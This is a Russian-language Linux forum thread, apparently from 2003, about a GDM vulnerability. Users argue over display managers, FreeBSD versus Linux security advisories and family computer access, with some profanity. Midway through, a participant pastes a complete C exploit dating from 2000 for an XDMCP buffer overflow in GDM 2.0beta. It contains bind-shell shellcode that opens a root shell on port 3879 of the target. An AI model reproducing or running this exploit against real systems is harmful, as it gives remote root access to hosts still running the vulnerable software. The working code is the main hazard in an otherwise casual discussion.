Уязвимость в GDM

Жаль, я KDE пользуюсь ;)

а зачем что-то кроме xdm использовать

а зачем xdm использовать ? login рулез форева

> login рулез форева

Нафига login ? - сразу shell :)

dilmah, ибо xdm убог

ну чем он убог??

ну не понимаю я кому не хватает .xsession. Настрой его как хочешь. Можешь там даже выбор оболочки делать, но я не понимаю зачем одному юзеру много оболочек.

> возможность выключения компа/перезагрузки уже появилась?

ну да, будут мне дети перезагружать мою машину

А мне пофиг - у меня kdm

Кстати, масяныч, фришники ОЧЕНЬ любят напоминать что такие штучки как гном/мозилла/кде/... у них тоже есть и ими пользуются. Значит эта уязвимость касается и фри, не так ли ?

dilmah, anonymous (*) (2003-08-25 17:04:31.442429) правильно сказал, именно этим xdm и убог. DM должен позволять перезагружать/выключать комп и выбрать среду из имеющихся, а от детей надо лочить комп, ибо убогость - не панацея. Еще DM, лично на мой взгляд, должен иметь приятный внешний вид и быть в этом плане конфигурябельным. Все это есть в GDM.

чтобы перезагрузить машину xdm не нужен. А вот запустить удаленную Х-сессию (допустим с виндовс машины) и с нормальным WM отстаротованным на Linux-машине - вот для чего он нужен.

Во народ - без мышки комп перезагрузить/становить не может, а нах уже посылать научился :)

"Пить-курить-систему_администрить я начал аднавременна!"

Ах да вспомнил ! мало того что у меня кдм так у меня еще и автологин стоит (дома конечно).

Дыра в gdm (rootshell) была еще в 2000 г.

/*
* gdm (xdmcp) exploit
* written 05/2000 by AbraxaS
*
* abraxas@sekure.de && www.sekure.de
*
*
* Tested on: SuSE 6.2 / gdm-2.0beta1-4,
* RedHat 6.2 / gdm-2.0beta2
*
* Offsets: Worked with offsets between 0 and 300
*
* Usage: gdmexpl [target] [offset]
*
* Note: Just a proof of concept.
*
* Greetings to: dies, grue, lamagra & (silly) peak
*/

#include <stdio.h>
#include <strings.h>
#include <unistd.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netdb.h>

#define NOP 0x90

/* lammys bind shell code / binds a shell to port 3879 */
char code[]=
"\x89\xe5\x31\xd2\xb2\x66\x89\xd0\x31\xc9\x89\xcb\x43\x89\x5d\xf8"
"\x43\x89\x5d\xf4\x4b\x89\x4d\xfc\x8d\x4d\xf4\xcd\x80\x31\xc9\x89"
"\x45\xf4\x43\x66\x89\x5d\xec\x66\xc7\x45\xee\x0f\x27\x89\x4d\xf0"
"\x8d\x45\xec\x89\x45\xf8\xc6\x45\xfc\x10\x89\xd0\x8d\x4d\xf4\xcd"
"\x80\x89\xd0\x43\x43\xcd\x80\x89\xd0\x43\xcd\x80\x89\xc3\x31\xc9"
"\xb2\x3f\x89\xd0\xcd\x80\x89\xd0\x41\xcd\x80\xeb\x18\x5e\x89\x75"
"\x08\x31\xc0\x88\x46\x07\x89\x45\x0c\xb0\x0b\x89\xf3\x8d\x4d\x08"
"\x8d\x55\x0c\xcd\x80\xe8\xe3\xff\xff\xff/bin/sh";

int resolve (char *denise)
{
struct hostent *info;
unsigned long ip;

if ((ip=inet_addr(denise))==-1)
{
if ((info=gethostbyname(denise))==0)
{
printf("Couldn't resolve [%s]\n", denise);
exit(0);
}
memcpy(&ip, (info->h_addr), 4);
}
return (ip);
}

int main (int argc, char **argv)
{
char uhm;
int nadine;
short blah[6];
char buffy[1400]; /* you might make this buffer bigger to increase the
probability to hit the right addy. making the
buffer too big could destroy the code though */
unsigned long addy;
struct sockaddr_in stephanie;
char big_buffy[sizeof(buffy)+12];

if (argc < 3)
{
printf("\nGDM 2.0betaX exploit by AbraxaS (abraxas@sekure.de)"
"\nUsage: %s [target] [offset]\n", argv[0]);
exit(0);
}

addy = 0xbffff8c0-atoi(argv[2]);

stephanie.sin_family = AF_INET;
stephanie.sin_port = htons (177);
stephanie.sin_addr.s_addr = resolve(argv[1]);
nadine = socket (AF_INET, SOCK_DGRAM, 0);

if (connect(nadine,(struct sockaddr *)&stephanie,sizeof(struct
sockaddr))<0)
{
perror("Connect"); exit(0);
}

/* filling buffer.buffy with NOPs */
memset(buffy, NOP, sizeof(buffy));
/* cleaning buffer.big_buffy */
bzero(big_buffy, sizeof(big_buffy));

/*
* creating XDMCP header
*/

/* XDM_PROTOCOL_VERSION */
blah[0] = htons(1);
/* opcode "FORWARD_QUERY" */
blah[1] = htons(4);
/* length (checksum)*/
blah[2] = htons(5+sizeof(buffy)); /* see checksum algorithm */
/* length of display buffer */
blah[3] = htons(sizeof(buffy));
/* display port */
blah[4] = htons(0);
/* authlist */
blah[5] = htons(0);

*(short *)&big_buffy[0]=blah[0];
*(short *)&big_buffy[2]=blah[1];
*(short *)&big_buffy[4]=blah[2];
*(short *)&big_buffy[6]=blah[3];
*(short *)&big_buffy[sizeof(buffy)+8]=blah[4];
*(short *)&big_buffy[sizeof(buffy)+10]=blah[5];

/* writing shellcode */
memcpy(buffy+sizeof(buffy)-strlen(code), code, strlen(code));

/* fixing some stuff */
*(long *)&buffy[0] = 0x0100007f; /* source address, not neccessary */
*(long *)&buffy[4] = 0x00000000; /* cleaning clnt_authlist */
*(long *)&buffy[8] = 0x00000000;

/* writing own RET address */
*(long *)&buffy[32]=addy;

/* copying buffy into big_buffy */
memcpy(big_buffy+8, buffy, sizeof(buffy));

/* sending big_buffy */
write(nadine, big_buffy, sizeof(big_buffy));

printf("\nConnect to %s, port 3879 now.", argv[1]);
printf("\nBut behave :) --abraxas\n");

close(nadine);

}

Масяныч, ну и горазд же ты врать

a bug allowing local users
to read _any_text_ files on the system, and a denial of service issue if
XDMCP is enabled.

Сравни с тем что ты написал -

> Локальный пользователь может прочесть _любой_ файл в системе.

Versions of GDM prior to 2.4.1.6 contain a bug where GDM will run as root when examining the ~/.xsession-errors file when using the "examine session errors" feature, allowing local users the ability to read any text file on the system by creating a symlink

Ты читать умееешь ?

Я писал про дыру XDMCP в 2000 году

Кстати, масяныч, фришники ОЧЕНЬ любят напоминать что такие штучки как гном/мозилла/кде/... у них тоже есть и ими пользуются. Значит эта уязвимость касается и фри, не так ли ?

Может быть, но пока тишина, последний SA от 10 августа.

anonymous (*) (2003-08-25 17:39:03.0542) > Во народ - без мышки комп перезагрузить/становить не может, а нах уже посылать научился :)

Это откуда у тебя такие выводы? Я умею замечательно выключать/перезагружать комп из командной строки (и без переключения в консоль), просто, раз уж я пользуюсь графической средой, я желаю из графической же среды это и делать. Я доступно объясняю?

Хотя это не я нах посылал, вообще говоря. :) Но ребут в DM мне тоже симпатичен.

>> Ты читать умееешь ? Я писал про дыру XDMCP в 2000 году

Масяныч у тебя проблемы с логикой ? я даю две цитаты - одну как ты написал в новости, вторую - как написано в оригинале.

При чем тут 2000 год ? кстати, то что SA для фришников нет говорит о том что они тормозят - глюк этот платформенно-независим

Масяныч опять отличился. Масяныч, а хотите, мы проверим - крутой ли вы сисадмин.

хм. недавно ставил SA для древней FreeBSD 4.4 Так во - апдейтов ядерных там было 5 серьезных, остальные для сервисов - 4 штуки. Кто может показать что не более 10-ти было с тех пор для Линуха ? Больше, намного больше.

Только Owl может похвастаться.

>Только Owl может похвастаться.

Чем ?

Кто может показать что не более 10-ти было с тех пор для Линуха ? Больше, намного больше.

Штук 200 было, не меньше, из них масса root exploit

>>>>>>> хм. недавно ставил SA для древней FreeBSD 4.4 Так во - апдейтов ядерных там было 5 серьезных, остальные для сервисов - 4 штуки. Кто может показать что не более 10-ти было с тех пор для Линуха ? Больше, намного больше.

А что у вас на той машинке есть-то ? вы же не хотите сказать что вашему апачу не требуются апдейты в отличии от линуксового ? Или openssl у вас там особый ? Могу сказать что только для двух этих вещей апдейтов бутет намного больше чем 10.

Так что у вас там на машинке - ядро + шелл ?

anonymous (*) (2003-08-25 17:34:34.441589)
>правильно сказал, именно этим xdm и убог. DM должен позволять >перезагружать/выключать комп и выбрать среду из имеющихся, а >от детей надо лочить комп, ибо убогость - не панацея. Еще DM, >лично на мой взгляд, должен иметь приятный внешний вид и быть в >этом плане конфигурябельным. Все это есть в GDM.

нет, у детей должен быть свой комп. С ОС на которой можно играть
(в меру) и чему нибудь учится. И чтобы это было удобно (для детей,
опять же, а не для гиков что тут тусят ;) )
И вообще, кто в своем уме от родни комп лочит ?
Вы че мужики !??

>Во народ - без мышки комп перезагрузить/становить не может, а нах уже посылать научился :)

ебать в рот, это через sudo чтоль? если да, то иди нахуй с таким методом

> И вообще, кто в своем уме от родни комп лочит ?

Я. У меня же там дисер. Включать/выключать/перезагружать/работать/играть под своим логином - ну сколько угодно

> из них масса root exploit

Перечисли их поименно.

> для древней FreeBSD 4.4

Ох и древняя! Ровесница ядра 2.4.

>>> Масяныч опять отличился. Масяныч, а хотите, мы проверим - крутой ли вы сисадмин.

Руут-а так проверили что ни его самого ни треда уже не найти Один тут клоун остался - масяныч

А раньше-то - что твой огр, что ирси, что антихрист с рутом

>Я. У меня же там дисер. Включать/выключать/перезагружать/работать/играть под своим логином - ну сколько угодно

А СDR-RW зачем ?

Кстати а чего такого страшного если комп перегрузят/выключат
через (G/K/X)DM ?
Эт -ж не шнурок выдернуть - вот свой пароль детям говорить
точно не нужно ;) А так пусть играют ....

Гм, а че пару линухов поставить - жаба давит или религиозные убеждения запрещают? Oдин для себя, другой для жены/отроков - и пусть там себе резвятся :)

а проверьте ка меня на сисадмина
P.S 8 батлов пива за раз выпить могу.
pps ну и уроды те кто лочат комп от своей семьи ...
прально сказали бэкапы делать нужно ..
вот захочет кто программку поставить, опа - контакт ёр систем
администратор. (естст я имею ввиду нт 5+)

GDM это конечно интересно

а вот почему SCO уже лежит вторые сутки ? ;)

http://news.netcraft.com/archives/2003/08/24/sco_site_down_for_well_over_2_da...

>>>ебать в рот, это через sudo чтоль? если да, то иди нахуй с таким методом <<<

в крайнем случае (без root-овом) помогает ctrl-alt-f1, ctrl-alt-del..

sS: Вот это уже НОВОСТЬ и должно быть запостено в соотв. раздел ;]

Ура товарищи =)

<<<а вот почему SCO уже лежит вторые сутки ? ;)
http://news.netcraft.com/archives/2003/08/24/sco_site_down_for_well_over_2_da...;

Кто-то на слэшдоте интересную мысль толкнул... что поскольку они не считают GPL валидной, они тем самым нарушают копирайт целой толпы людей... и по DMCA их за это можно немедля вырубить, а разборки опосля устраивать...
гы... шютка наверное

А че вы все на Саныча наезжаете? Нормальный чел. Стоит ему только новость запостить так сразу флейм поднимается.

Блин GDM руль фарева! А баги в нем находят потому что народ им пользуется в отличие от всяких там XDM... Надо смотреть правде в глаза господа!

Гомик, это опять ты? Все нормальные люди пользуют xdm.

Все нормальные люди пользуют startx, когда им это надо.

xinit лучше и быстрее :)

> pps ну и уроды те кто лочат комп от своей семьи ... > прально сказали бэкапы делать нужно ..

Это ты урод. А у меня кроме бэкапов - отдельный логин для себя, отдельный (автологином!) - для семьи.

ЗЫ - спасет ли тебя бэкап скажем от того что кто-то когда-то стер пару страниц из 200/300 стр документа ? Ты этого по горячим следам не найдешь, а когда обнаружишь то обнаружишь что и бэкап то у тебя свеженький и в нем то же самое.

>> "Гм, а че пару линухов поставить - жаба давит или религиозные убеждения запрещают? Oдин для себя, другой для жены/отроков - и пусть там себе резвятся :)" Многопользовательская система. Каждому пользователю - по отдельному разделу со своей операционкой.

Раз уж тут пошло про много пользовательскую систему... То у меня вопрос. Почему в KDE если я залогинился на display :0, а потом для жены делаю "(X :1 &); env DISPLAY=:1 startkde". Во второй копии KDE (который на display :1) звука нет, я понимаю что /dev/dsp занят первой копией kde, но как это лечить???

например поставить нормальную звуковую карту :)

Это лечится правкой мод доступа в файле

/etc/security/console.perms

нет, боюсь наврал про моду, думал жена под своим логином работает, а по тому как ты написал можно понять, что обе Хсессии - твои. возможно это связано со звуковыми серверами(art или esd) - второй кде стартует свой саунд-сервер, а /dev/dsp уже занят. копать надо...

про XDM
http://www.nut.house.cx/~nemo/gallery/XDM

2anonymous (*) (2003-08-26 13:14:42.954942)

а nut и гик случайно не синонимы??:)